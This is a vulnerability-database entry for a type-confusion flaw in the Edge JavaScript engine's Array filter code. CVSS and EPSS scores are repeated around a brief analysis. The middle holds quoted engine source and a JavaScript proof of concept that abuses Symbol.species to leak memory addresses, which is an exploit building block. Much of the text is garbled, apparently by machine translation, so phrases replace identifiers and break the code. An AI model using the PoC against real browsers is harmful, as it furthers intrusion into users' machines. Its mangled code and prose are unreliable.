7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
7.6 High
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.7%
The ## 1. Analysis of the environment
Operating system: Windows 10 x64 Professional Edition 10.0.14393 browser: Microsoft Edge x64 38.14393.0
This is happening in the JavascriptArray::FilterHelper, due to the type of Confusion caused by the vulnerability, look at the commit
template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
{ if (args. Info. Count < 2 || ! JavascriptConversion::IsCallable(args[1]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u(“Array. prototype. filter”));
}
RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var method performs a stable = nullptr; if (args. Info. Count > 2)
{
method performs a stable = args[2];
} else {
method performs a stable = scriptContext->GetLibrary()->GetUndefined();
} // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object. - RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);
selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), The method performs a stable,
element,
JavascriptNumber::ToVar(k, scriptContext),
pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
{ // Try to fast path if the return object is an array - if (newArr)
Look under the POC
var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)). the slice(); var [hi, lo] = PutDataAndGetAddr(x); function PutDataAndGetAddr(t) { var d = new Array(1,2,3); class dummy { constructor() { return d;
}
} class MyArray extends Array { static get Symbol. species { return dummy;
}
} var a = new Array({}, t, “theori”, 7, 7, 7, 7, 7); function test(i) { return true;
}
a.__ proto__ = MyArray. prototype; var o = a. filter(test); var h = []; for (item in o) { var n = new Number(o[item]); if (n < 0) {
n = n + 0x100000000;
}
h. push(n);
} return [h[3], h[2]];
}
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
7.6 High
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.7%